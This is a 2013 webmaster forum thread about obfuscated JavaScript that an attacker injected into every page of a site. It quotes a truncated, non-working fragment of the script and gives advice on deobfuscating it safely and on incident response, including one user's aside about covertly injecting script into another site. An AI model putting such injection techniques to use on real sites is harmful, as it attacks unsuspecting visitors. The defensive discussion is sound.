Welcome to WebmasterWorld Guest from

Forum Moderators: open

Message Too Old, No Replies

Code hacked into our pages

Anyone have any idea what it was trying to do?



11:59 pm on Jan 7, 2013 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member

Someone recently hacked into our server and inserted the following code into pretty much random locations on every .htm page on our site via some automated method. Can't see any side effects. Any idea what they were trying to do, so we can check if there was any further harm done or what to watch for?
<script type="text/javascript" language="javascript" >
try{document["b"+"ody"]*=document}catch(dgsgsdg){zxc=1;ww=window;}try{d=document["createElement"]("span"[smilestopper]);}catch(agdsg){zxc=0;}try{if(ww.document)window["doc"+"ument"]["body"]="zxc"}catch(bawetawe){if(ww.document){v=window;n=[ LONG SEQUENCE OF TWO CHAR QUOTED NUMBER LETTER COMBINATIONS... NOT HEX CODE ];h=2;s="";if(zxc)


12:17 am on Jan 8, 2013 (gmt 0)

WebmasterWorld Senior Member swa66 is a WebmasterWorld Top Contributor of All Time 10+ Year Member

That's typical obfuscated code used by hackers. In essence the script calculates z from that n and then the eval(z) attacks your visitors.

Now to know what the script tried: you'd have to deobfuscate it. Usually the easiest is to take the obfuscated script on a sacrificial machine (read: virtual machine taht you copy and wipe afterwards in case it does execute too much) and replace the eval near the end with an alert and run it: it'll show what it tried to execute.

This kind of thing is not without danger: most of those will exploit the browser or some plugin, or load next stages that will eventually do that depending on the browser type and version detected.

In essence the right thing to do:
- consider all your machines that visited your website or were used to manage the content on your website as hacked till proven otherwise - note: an AV scan is no proof.
- find out how they got in (that's not in this script), it's most likely something else like SQL injection, SSH, ... if you cannot find it (hackers that know what they do wipe their traces): you're in for a lot of work as you now need a full security audit to find vulnerabilities and correct them - if you do not do this it will only come back again and again and again.
- fix security of your server to prevent future break-ins
- figure out what the script they put on every page of your site actually did
- warn visitors that you got hacked and tell them what they were subjected too (esp if you have recurring visitors)


4:22 am on Jan 8, 2013 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member

Oh [bleep]!
Thanks. It looks like it crawled through all the directories automatically, sequentially over a period of about an hour. It only touched the one domain on our server as far as we can tell. They must not have been too good of hackers, as they did not reset back the times on the changed files, which is how I discovered it. Otherwise it may have been months before we discovered it.

I had a nasty virus on my computer last week which I finally got rid of with some help, but this just happened yesterday.


8:12 am on Jan 8, 2013 (gmt 0)

WebmasterWorld Senior Member lucy24 is a WebmasterWorld Top Contributor of All Time Top Contributors Of The Month


Holy ###. They couldn't just say

{ blah, blah }
until (heat-death of the universe)



:: counting on fingers ::
base 26? Each letter is a digit?

I merrily inserted javascript into one site for almost two years before I got bored and said Here I Am. But they'd left the door standing wide open; the technique would never have worked in a normal site. (Like, say, yours or even mine. Trust me on this.)


8:41 am on Jan 8, 2013 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member

I believe there were probably exactly 456 (plus or minus) items in the "LONG SEQUENCE OF TWO CHAR QUOTED NUMBER LETTER COMBINATIONS", so yeah that's the way they stepped through them up to 456. The first few terms are: "1e","3o","4d","46","3l","4c"

I was thinking the other variable names may have been a clue to the writer, but zxc and asdg are basically keyboard neighbors. Personally, I'm a UNIX C programmer (from before there was a C++) and Windows and JS, as similar as it is, are not my forte.

As far as coming back, so far so good. I was afraid they may have hidden a cron job to reset them every night at the same time or a random time (how I would have done it :), but nothing so far.

Featured Threads

Hot Threads This Week

Hot Threads This Month